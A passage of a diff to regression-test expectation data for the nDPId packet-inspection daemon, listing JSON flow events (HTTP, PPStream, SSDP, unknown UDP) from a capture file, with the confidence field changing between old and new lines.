-00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":85,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353190040,"flow_last_seen":1467353190044,"flow_idle_time":7580000,"flow_min_l4_payload_len":158,"flow_max_l4_payload_len":1009,"flow_tot_l4_payload_len":1167,"flow_avg_l4_payload_len":583,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.19","src_port":50507,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} -00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":88,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353190634,"flow_last_seen":1467353190638,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":366,"flow_tot_l4_payload_len":510,"flow_avg_l4_payload_len":255,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.19","src_port":50508,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1467353152692,"flow_last_seen":1467353167734,"flow_idle_time":200000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":798,"flow_avg_l4_payload_len":133,"midstream":0,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.5.57","dst_ip":"239.255.255.250","src_port":59648,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} +00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1467353156641,"flow_last_seen":1467353156700,"flow_idle_time":7580000,"flow_min_l4_payload_len":257,"flow_max_l4_payload_len":1260,"flow_tot_l4_payload_len":2184,"flow_avg_l4_payload_len":728,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.20","src_port":50488,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00808{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"finished","flow_packets_processed":27,"flow_first_seen":1467353157138,"flow_last_seen":1467353157157,"flow_idle_time":7580000,"flow_min_l4_payload_len":372,"flow_max_l4_payload_len":1260,"flow_tot_l4_payload_len":32840,"flow_avg_l4_payload_len":1216,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.66","src_port":50491,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00804{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1467353157509,"flow_last_seen":1467353159746,"flow_idle_time":7580000,"flow_min_l4_payload_len":376,"flow_max_l4_payload_len":403,"flow_tot_l4_payload_len":1168,"flow_avg_l4_payload_len":389,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.66","src_port":50494,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":81,"flow_state":"finished","flow_packets_processed":246,"flow_first_seen":1467353189325,"flow_last_seen":1467353189439,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":1260,"flow_tot_l4_payload_len":306749,"flow_avg_l4_payload_len":1246,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.19","src_port":50505,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":85,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353190040,"flow_last_seen":1467353190044,"flow_idle_time":7580000,"flow_min_l4_payload_len":158,"flow_max_l4_payload_len":1009,"flow_tot_l4_payload_len":1167,"flow_avg_l4_payload_len":583,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.19","src_port":50507,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":88,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353190634,"flow_last_seen":1467353190638,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":366,"flow_tot_l4_payload_len":510,"flow_avg_l4_payload_len":255,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.19","src_port":50508,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} 00597{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1467353136837,"flow_last_seen":1467353136837,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"114.47.91.129","src_port":22793,"dst_port":22576,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00582{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1467353136837,"flow_last_seen":1467353136837,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"114.47.91.129","src_port":22793,"dst_port":22576,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1467353138757,"flow_last_seen":1467353138794,"flow_idle_time":7580000,"flow_min_l4_payload_len":187,"flow_max_l4_payload_len":1260,"flow_tot_l4_payload_len":1699,"flow_avg_l4_payload_len":566,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"101.227.200.11","src_port":50463,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.PPStream","breed":"Fun","category":"Streaming"}} -00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1467353140755,"flow_last_seen":1467353140794,"flow_idle_time":7580000,"flow_min_l4_payload_len":602,"flow_max_l4_payload_len":1024,"flow_tot_l4_payload_len":4283,"flow_avg_l4_payload_len":856,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"101.227.32.39","src_port":50476,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.PPStream","breed":"Fun","category":"Streaming"}} -00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1467353165456,"flow_last_seen":1467353165492,"flow_idle_time":7580000,"flow_min_l4_payload_len":187,"flow_max_l4_payload_len":1260,"flow_tot_l4_payload_len":1699,"flow_avg_l4_payload_len":566,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"101.227.200.11","src_port":50496,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.PPStream","breed":"Fun","category":"Streaming"}} -00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":65,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353160157,"flow_last_seen":1467353163154,"flow_idle_time":200000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":274,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.5.48","dst_ip":"239.255.255.250","src_port":63930,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} -00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":69,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1467353166729,"flow_last_seen":1467353166729,"flow_idle_time":200000,"flow_min_l4_payload_len":88,"flow_max_l4_payload_len":88,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":88,"midstream":0,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.5.63","dst_ip":"239.255.255.250","src_port":39383,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} +00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1467353138757,"flow_last_seen":1467353138794,"flow_idle_time":7580000,"flow_min_l4_payload_len":187,"flow_max_l4_payload_len":1260,"flow_tot_l4_payload_len":1699,"flow_avg_l4_payload_len":566,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"101.227.200.11","src_port":50463,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.PPStream","breed":"Fun","category":"Streaming"}} +00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1467353140755,"flow_last_seen":1467353140794,"flow_idle_time":7580000,"flow_min_l4_payload_len":602,"flow_max_l4_payload_len":1024,"flow_tot_l4_payload_len":4283,"flow_avg_l4_payload_len":856,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"101.227.32.39","src_port":50476,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.PPStream","breed":"Fun","category":"Streaming"}} +00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1467353165456,"flow_last_seen":1467353165492,"flow_idle_time":7580000,"flow_min_l4_payload_len":187,"flow_max_l4_payload_len":1260,"flow_tot_l4_payload_len":1699,"flow_avg_l4_payload_len":566,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"101.227.200.11","src_port":50496,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.PPStream","breed":"Fun","category":"Streaming"}} +00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":65,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353160157,"flow_last_seen":1467353163154,"flow_idle_time":200000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":274,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.5.48","dst_ip":"239.255.255.250","src_port":63930,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} +00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":69,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1467353166729,"flow_last_seen":1467353166729,"flow_idle_time":200000,"flow_min_l4_payload_len":88,"flow_max_l4_payload_len":88,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":88,"midstream":0,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.5.63","dst_ip":"239.255.255.250","src_port":39383,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 00597{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1467353136439,"flow_last_seen":1467353136440,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":74,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"111.249.53.196","src_port":22793,"dst_port":32443,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00582{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1467353136439,"flow_last_seen":1467353136440,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":74,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"111.249.53.196","src_port":22793,"dst_port":32443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":90,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353191500,"flow_last_seen":1467353191505,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":439,"flow_tot_l4_payload_len":583,"flow_avg_l4_payload_len":291,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.20","src_port":50766,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} -00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":91,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1467353191521,"flow_last_seen":1467353191606,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":476,"flow_tot_l4_payload_len":2480,"flow_avg_l4_payload_len":310,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.20","src_port":50767,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} -00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":93,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353191604,"flow_last_seen":1467353191608,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":472,"flow_tot_l4_payload_len":616,"flow_avg_l4_payload_len":308,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.19","src_port":50768,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} -00692{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":102,"flow_state":"finished","flow_packets_processed":529,"flow_first_seen":1467353196856,"flow_last_seen":1467353197680,"flow_idle_time":7580000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":1260,"flow_tot_l4_payload_len":664395,"flow_avg_l4_payload_len":1255,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.20","src_port":50778,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.PPStream","breed":"Fun","category":"Streaming"}} -00692{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":105,"flow_state":"finished","flow_packets_processed":542,"flow_first_seen":1467353198532,"flow_last_seen":1467353199507,"flow_idle_time":7580000,"flow_min_l4_payload_len":249,"flow_max_l4_payload_len":1260,"flow_tot_l4_payload_len":681117,"flow_avg_l4_payload_len":1256,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.20","src_port":50780,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.PPStream","breed":"Fun","category":"Streaming"}} +00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":90,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353191500,"flow_last_seen":1467353191505,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":439,"flow_tot_l4_payload_len":583,"flow_avg_l4_payload_len":291,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.20","src_port":50766,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":91,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1467353191521,"flow_last_seen":1467353191606,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":476,"flow_tot_l4_payload_len":2480,"flow_avg_l4_payload_len":310,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.20","src_port":50767,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":93,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353191604,"flow_last_seen":1467353191608,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":472,"flow_tot_l4_payload_len":616,"flow_avg_l4_payload_len":308,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.19","src_port":50768,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00692{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":102,"flow_state":"finished","flow_packets_processed":529,"flow_first_seen":1467353196856,"flow_last_seen":1467353197680,"flow_idle_time":7580000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":1260,"flow_tot_l4_payload_len":664395,"flow_avg_l4_payload_len":1255,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.20","src_port":50778,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.PPStream","breed":"Fun","category":"Streaming"}} +00692{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":105,"flow_state":"finished","flow_packets_processed":542,"flow_first_seen":1467353198532,"flow_last_seen":1467353199507,"flow_idle_time":7580000,"flow_min_l4_payload_len":249,"flow_max_l4_payload_len":1260,"flow_tot_l4_payload_len":681117,"flow_avg_l4_payload_len":1256,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.20","src_port":50780,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.PPStream","breed":"Fun","category":"Streaming"}} 00585{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":106,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353200271,"flow_last_seen":1467353200271,"flow_idle_time":7580000,"flow_min_l4_payload_len":249,"flow_max_l4_payload_len":249,"flow_tot_l4_payload_len":249,"flow_avg_l4_payload_len":249,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.20","src_port":50781,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00585{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":87,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1467353190168,"flow_last_seen":1467353190235,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":290,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"202.108.14.219","dst_ip":"192.168.115.8","src_port":80,"dst_port":50295,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00638{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":338,"flow_first_seen":1467353136439,"flow_last_seen":1467353136982,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":1065,"flow_tot_l4_payload_len":124558,"flow_avg_l4_payload_len":368,"midstream":0,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"114.42.0.158","src_port":22793,"dst_port":7716,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Unknown","breed":"Unrated"}} -00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":80,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1467353187172,"flow_last_seen":1467353202194,"flow_idle_time":200000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":798,"flow_avg_l4_payload_len":133,"midstream":0,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.5.28","dst_ip":"239.255.255.250","src_port":60023,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} +00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":80,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1467353187172,"flow_last_seen":1467353202194,"flow_idle_time":200000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":798,"flow_avg_l4_payload_len":133,"midstream":0,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.5.28","dst_ip":"239.255.255.250","src_port":60023,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1467353136833,"flow_last_seen":1467353136833,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"210.44.171.1","src_port":22793,"dst_port":29702,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1467353136833,"flow_last_seen":1467353136833,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"210.44.171.1","src_port":22793,"dst_port":29702,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353156959,"flow_last_seen":1467353156998,"flow_idle_time":7580000,"flow_min_l4_payload_len":199,"flow_max_l4_payload_len":376,"flow_tot_l4_payload_len":575,"flow_avg_l4_payload_len":287,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"119.188.13.188","src_port":50489,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} -00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353157063,"flow_last_seen":1467353157103,"flow_idle_time":7580000,"flow_min_l4_payload_len":303,"flow_max_l4_payload_len":425,"flow_tot_l4_payload_len":728,"flow_avg_l4_payload_len":364,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"119.188.13.188","src_port":50490,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} 